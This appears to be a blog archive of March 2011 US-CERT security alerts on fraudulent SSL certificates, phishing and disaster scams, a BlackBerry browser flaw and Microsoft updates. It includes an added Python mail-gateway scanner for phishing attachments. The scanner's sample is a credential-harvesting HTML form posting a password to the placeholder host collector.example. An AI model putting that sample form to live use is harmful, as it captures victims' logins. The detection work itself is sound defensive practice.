Archive for March, 2011

US-CERT is aware of public reports of the existence of fraudulent SSL certificates. These fraudulent SSL certificates could be used by an attacker to masquerade as a trusted website. Multiple web browser vendors have provided updates to recognize and block these fraudulent SSL certificates.

Mozilla has updated Firefox 4.0, 3.6, and 3.5. Additional information can be found in the Mozilla Security Blog.

Microsoft has released updates for various platforms in Microsoft Knowledge Base Article 2524375. Additional information can be found in Microsoft Security Advisory 2524375.

US-CERT encourages users and administrators to apply any necessary updates to help mitigate the risks. US-CERT will provide additional information as it becomes available.

Relevant Url(s):
<http://blog.mozilla.com/security/2011/03/22/firefox-blocking-fraudulent-certificates/>

<http://www.microsoft.com/technet/security/advisory/2524375.mspx>

<http://support.microsoft.com/kb/2524375>

US-CERT is aware of public reports of an ongoing phishing attack. At this time, this attack appears to be targeting PayPal, Bank of America, Lloyds, and TSB users. The attack arrives via an unsolicited email message containing an HTML attachment.

This attack is unlike common phishing attacks because it stores the malicious webpage locally rather than directing the user to a phishing site via a URL. Many browsers use anti-phishing filters to help protect users against phishing attacks, but this method of attack is able to bypass this security mechanism.

US-CERT encourages users and administrators to take the following measures to protect themselves from these types of phishing attacks:
* Do not follow unsolicited web links or attachments in email
messages.
* Use caution when providing personal information online.
* Verify the legitimacy of the email by contacting the organization
directly through a trusted contact method.
* Refer to the Recognizing and Avoiding Email Scams (pdf) document
for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks
document for more information on social engineering attacks.
* Refer to the Using Caution with Email Attachments Cyber Security
Tip for more information on safely handling email attachments.
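
A mail-gateway check for the delivery method described above, as an added example that is not part of the US-CERT text: because the page is opened from local disk, URL-based browser filters never see it, so the check inspects HTML attachments for forms that post to a remote host. The sample message, the host name, and all function names are constructed for illustration.

```python
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample data; collector.example is a placeholder host.
SAMPLE_HTML = """<form action="http://collector.example/submit" method="post">
<input type="text" name="user"><input type="password" name="pw"></form>"""


class FormAudit(HTMLParser):
    """Records forms that submit to a remote host, and password inputs."""
    def __init__(self):
        super().__init__()
        self.remote_actions, self.password_fields = [], 0

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        action = attrs.get("action") or ""
        if tag == "form" and urlparse(action).scheme in ("http", "https"):
            self.remote_actions.append(action)
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.password_fields += 1


def scan_message(msg):
    """Return one finding per HTML attachment whose form posts to a remote host."""
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html"
        if not (is_html or name.lower().endswith((".htm", ".html"))):
            continue
        body = part.get_content()
        if isinstance(body, bytes):  # HTML sent as application/octet-stream
            body = body.decode("utf-8", "replace")
        audit = FormAudit()
        audit.feed(body)
        if audit.remote_actions:
            findings.append({"attachment": name, "posts_to": audit.remote_actions,
                             "password_fields": audit.password_fields})
    return findings


def build_sample():
    msg = EmailMessage()
    msg.set_content("Please complete the attached form.")
    msg.add_attachment(SAMPLE_HTML, subtype="html", filename="verify.html")
    msg.add_attachment("Meeting notes", subtype="plain", filename="notes.txt")
    return msg
```

A finding with a non-zero `password_fields` count is the stronger signal; a gateway could quarantine such messages or strip the attachment before delivery.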

In the past, US-CERT has received reports of an increased number of phishing scams and malware campaigns that take advantage of the United States tax season. Due to the upcoming tax deadline, US-CERT reminds users to remain cautious when receiving unsolicited email that could be part of a potential phishing scam or malware campaign.

These phishing scams and malware campaigns may include, but are not limited to, the following:
* information that refers to a tax refund
* warnings about unreported or under-reported income
* offers to assist in filing for a refund
* details about fake e-file websites

These messages, which may appear to be from the IRS, may ask users to submit personal information via email or may instruct the user to follow a link to a website that requests personal information or contains malicious code.

US-CERT encourages users and administrators to take the following measures to protect themselves from these types of phishing scams and malware campaigns:
* Do not follow unsolicited web links in email messages.
* Maintain up-to-date antivirus software.
* Refer to the IRS website related to phishing, email, and bogus
website scams for scam samples and reporting information.
* Refer to the Recognizing and Avoiding Email Scams (pdf) document
for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks
document for more information on social engineering attacks.
* Review the Wall Street Journal blog post “Cybercrooks Digging for
Tax Data” for additional suggestions for protecting against these
types of attacks.

Relevant Url(s):
<http://blogs.wsj.com/digits/2011/03/11/cybercrooks-digging-for-tax-data/>

Research In Motion has released a security notice to alert users of a vulnerability affecting the WebKit browser engine provided in BlackBerry Device Software versions 6.0 and later. By convincing a user to browse to a specially crafted website, a remote attacker may be able to execute arbitrary code. Exploitation of this vulnerability may allow an attacker to access user data stored on the media card and the built-in media storage on the affected BlackBerry device.

US-CERT encourages users and administrators to review BlackBerry security notice KB26132 and do the following to help mitigate the risks:
* Exercise caution when accessing untrusted websites in browsers,
email messages, or instant messages.
* Disable the use of JavaScript in the BlackBerry Browser or disable
the BlackBerry Browser as suggested in BlackBerry security notice
KB26132.

Additional information regarding this vulnerability can be found in US Department of Energy Cyber Incident Response Capability (DOE-CIRC) technical bulletin T-579. US-CERT will provide additional information as it becomes available.

Relevant Url(s):
<http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB26132#environmentSection>

<http://www.doecirc.energy.gov/bulletins/t-579.shtml>

US-CERT would like to warn users of potential email scams, fake antivirus and phishing attacks regarding the Japan earthquake and the tsunami disasters. Email scams may contain links or attachments which may direct users to phishing or malware-laden websites. Fake antivirus attacks may come in the form of pop-ups which flash security warnings and ask the user for credit card information. Phishing emails and websites requesting donations for bogus charitable organizations commonly appear after these types of natural disasters.

US-CERT encourages users to take the following measures to protect themselves:
* Do not follow unsolicited web links or attachments in email messages.
* Maintain up-to-date antivirus software.
* Review the Recognizing Fake Antivirus document for additional information on recognizing fake antivirus.
* Refer to the Avoiding Social Engineering and Phishing Attacks document for additional information on social engineering attacks.
* Refer to the Recognizing and Avoiding Email Scams (pdf) document for additional information on avoiding email scams.
* Review the Federal Trade Commission’s Charity Checklist.
* Verify the legitimacy of the email by contacting the organization directly through a trusted contact number. Trusted contact information can be found on the Better Business Bureau National Charity Report Index.

US-CERT will provide additional information as it becomes available.

Relevant Url(s):
<http://www.us-cert.gov/cas/tips/ST04-014.html>

<https://www.us-cert.gov/cas/tips/ST10-001.html>

<http://www.ftc.gov/bcp/edu/pubs/consumer/telemarketing/tel01.shtm>

<http://www.us-cert.gov/reading_room/emailscams_0905.pdf>

<http://www.bbb.org/charity-reviews/national/>

Malicious code is not always hidden in web page scripts or unusual file
formats. Attackers may corrupt types of files that you would recognize and
typically consider safe, so you should take precautions when opening files
from other people.

What types of files can attackers corrupt?

An attacker may be able to insert malicious code into any file, including
common file types that you would normally consider safe. These files may
include documents created with word processing software, spreadsheets, or
image files. After corrupting the file, an attacker may distribute it
through email or post it to a web site. Depending on the type of malicious
code, you may infect your computer by just opening the file.

When corrupting files, attackers often take advantage of vulnerabilities
that they discover in the software that is used to create or open the file.
These vulnerabilities may allow attackers to insert and execute malicious
scripts or code, and they are not always detected. Sometimes the
vulnerability involves a combination of certain files (such as a particular
piece of software running on a particular operating system) or only affects
certain versions of a software program.

What problems can malicious files cause?

There are various types of malicious code, including viruses, worms, and
Trojan horses (see Why is Cyber Security a Problem? for more information).
However, the range of consequences varies even within these categories. The
malicious code may be designed to perform one or more functions, including
* interfering with your computer’s ability to process information by
consuming memory or bandwidth (causing your computer to become
significantly slower or even “freeze”)
* installing, altering, or deleting files on your computer
* giving the attacker access to your computer
* using your computer to attack other computers (see Understanding
Denial-of-Service Attacks for more information)

How can you protect yourself?

* Use and maintain anti-virus software – Anti-virus software can often
recognize and protect your computer against most known viruses, so you
may be able to detect and remove the virus before it can do any damage
(see Understanding Anti-Virus Software for more information). Because
attackers are continually writing new viruses, it is important to keep
your definitions up to date.
* Use caution with email attachments – Do not open email attachments that
you were not expecting, especially if they are from people you do not
know. If you decide to open an email attachment, scan it for viruses
first (see Using Caution with Email Attachments for more information).
Not only is it possible for attackers to “spoof” the source of an email
message, but your legitimate contacts may unknowingly send you an
infected file. If your email program automatically downloads
attachments, check your settings to see if you can disable this feature.
* Be wary of downloadable files on web sites – Avoid downloading files
from sites that you do not trust. If you are getting the files from a
supposedly secure site, look for a web site certificate (see
Understanding Web Site Certificates for more information). If you do
download a file from a web site, consider saving it to your computer and
manually scanning it for viruses before opening it.
* Keep software up to date – Install software patches so that attackers
cannot take advantage of known problems or vulnerabilities (see
Understanding Patches for more information). Many operating systems
offer automatic updates. If this option is available, you should enable
it.
* Take advantage of security settings – Check the security settings of
your email client and your web browser (see Evaluating Your Web
Browser’s Security Settings for more information). Apply the highest
level of security available that still gives you the functionality you
need.

Related information

* Securing Your Web Browser
* Recovering from Viruses, Worms, and Trojan Horses
_________________________________________________________________

Author: Mindi McDowell

Original release date: March 08, 2011
Last revised: –
Source: US-CERT

Systems Affected

* Microsoft Windows
* Microsoft Office

Overview

There are multiple vulnerabilities in Microsoft Windows and
Microsoft Office. Microsoft has released updates to address these
vulnerabilities.

Solution

Install updates

The updates to address these vulnerabilities are available on the
Microsoft Update site (requires Internet Explorer). We recommend
enabling Automatic Updates.

Description

The Microsoft Security Bulletin Summary for March 2011 describes
multiple vulnerabilities in Microsoft Windows and Microsoft Office.
Microsoft has released updates to address the vulnerabilities.

References

* Microsoft Security Bulletin Summary for March 2011 -
<https://www.microsoft.com/technet/security/bulletin/ms11-mar.mspx>

* Microsoft Update – <https://www.update.microsoft.com/>

* Microsoft Update Overview -
<http://www.microsoft.com/security/updates/mu.aspx>

* Managing Automatic Updates -
<http://windows.microsoft.com/en-us/windows-vista/Turn-automatic-updating-on-or-off>